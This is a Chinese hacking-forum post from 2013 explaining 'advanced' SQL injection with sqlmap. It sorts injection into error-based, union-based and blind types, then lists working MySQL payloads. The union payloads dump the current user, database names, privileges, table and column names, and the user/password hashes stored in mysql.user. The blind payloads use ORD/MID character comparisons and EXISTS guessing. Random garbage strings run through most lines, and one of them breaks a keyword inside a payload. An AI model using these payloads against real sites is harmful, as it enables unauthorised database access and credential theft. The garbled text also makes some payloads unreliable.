找回密码
 立即注册
查看: 2589|回复: 0
打印 上一主题 下一主题

sqlmap高级注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-16 20:31:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。, Z" ^" E) d: x1 J
# k$ |" e; h- v7 a$ m
这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表0 D% \) s; c2 a

# ?" z' X9 _* g: ^: F* |分类标准        分类        备注6 @+ z8 q1 g! r8 W
按字段类型        整型注入,字符型注入        ' {+ o) r. B. u9 V# s! c7 F* w. }
按出现的位置        get注入,post注入,cookie注入,http header注入       
* |, O9 l4 V+ N' D- I  L然而高级注入是这样的: b+ L& ?( f* e# @2 ]4 f% G, g
3 R$ V) h% x! z5 p8 T8 t: A* V
高级注入分类        条件" D- S- v4 g; v# z
error-based sql        数据库的错误回显可以返回,存在数据库,表结构% V% v/ n$ i5 r, [: [& h7 j
union-based sql        能够使用union,存在数据库,表结构% z1 j( ~1 M1 r! D
blind sql        存在注入
2 e& s$ |$ o7 e8 n5 q, n! S我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。, L: W9 L$ S# K; X; J
5 I$ k  w7 G( s& W% k7 Y
好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火8 x% q+ P/ x2 N) S  F9 Q

$ t$ r6 j3 G2 k附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。+ K+ g% W: ~+ C1 P( ?3 q
6 B: p: ]3 S) O! ~! G- g' b& m
这里用mysql说明$ c# i1 T# I7 }% K4 H! Y: X4 G  h
" q4 Q, k  G, _* F" W
e注入坛子里很多了,请看戳我或者再戳我) ^  f  }2 R3 [! @
: h7 _4 Q* A9 T# E
u注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的$ z6 _9 d4 W, q" t4 T6 z' v

" F, k* v' p0 O+ m8 _/ @9 X获取当前数据库用户名
; w# i6 e" H5 x# ~+ X  c: X4 @! Q , x  Y6 l7 U2 a. m- K
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C3 X, M' r# p' |* `) s, F
AST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL: b: A) O/ K" O- j+ Z3 Y# I% J
L, NULL#
' W. C9 [" R5 R注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。  \6 U+ F$ z9 i1 _0 ?4 l: ~
8 ?1 W1 L/ u: q" I8 H+ T
获取数据库名0 F, B6 K  [0 i* F7 x" z7 g; m: t( x

) p- v& p! w( TUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#' F: K4 e% N$ ^3 R, Q; y  ~
获取所有用户名
) `/ P& x5 F( W$ C7 R' i : @4 j9 `1 _# X1 C0 M7 t) K
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#4 n1 S& }8 G9 n# c6 H5 R
查看当前用户权限
$ ~4 P3 i* G1 A$ ?& @
+ g; T/ v) [3 |UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES## \2 S3 x. g7 D* t; o6 H
尝试获取密码,当然需要有能读mysql数据库的权限
4 _1 |6 p# l0 H; {$ K; ?   Q' X1 C, x) @6 c6 h' r8 F3 }
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#
7 @% Q* m) h3 A9 R( h" L获取表名,limit什么的自己搞啦; v: ]! Y9 U& W5 j( O8 q
" w/ b: K3 U$ U! o5 d  \1 w
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#1 J" v, l2 F5 b# n9 ~5 J  i
获取字段名及其类型
& |- c5 c) k& v( X$ OUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#
3 O; _( G1 I" ]9 | . U) {. X, R3 ~9 M- u
b注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。
; p$ L, `4 `7 P: m
! r; F( t% s) Q/ N: ^3 O如:) z7 w6 n" o) k. i8 {
获取当前用户名; O# m& P" h3 q  e

. O: @+ o- G! G! I( K: n/ RAND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116& ^# s) ?4 w  N. S  [
获取当前数据库
- C7 N8 D  S! q* l9 e# q% x% _* Y
" a' H, P& [2 e' EAND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106, ]' X# p5 l+ ?
获取表名+ O! r; G3 x3 g0 n4 ?

- B' v# Y' x  |. j" }. tAND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51# `+ {( g" l- L* x
获取字段名及其类型和爆内容就不说了,改改上面的就可以了。
+ h$ G: ?* ?3 l3 u回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。
4 Z% t7 o( U7 X& _& Y' M" d爆表1 P1 u$ ~2 u9 {* D/ s5 X: F! j

0 o8 V$ X0 p) N/ K/ q1 dAND EXISTS(select * from table)# E, o, i) E; y' ^1 M
爆字段( ^% |; c* D! o. x' ?5 V
+ v# U. b" ?7 b
AND EXISTS(select pwd from table)
' v5 i2 S0 Z$ j, c$ @盲注的变化就比较多了,由于篇幅,只是举个例子而已。2 f  k( m3 P  S9 E! M5 z
/ b4 {6 E7 ^7 w: \! I, b, o+ I4 W$ Y- p
本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。4 C0 h7 C3 V: R7 b
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表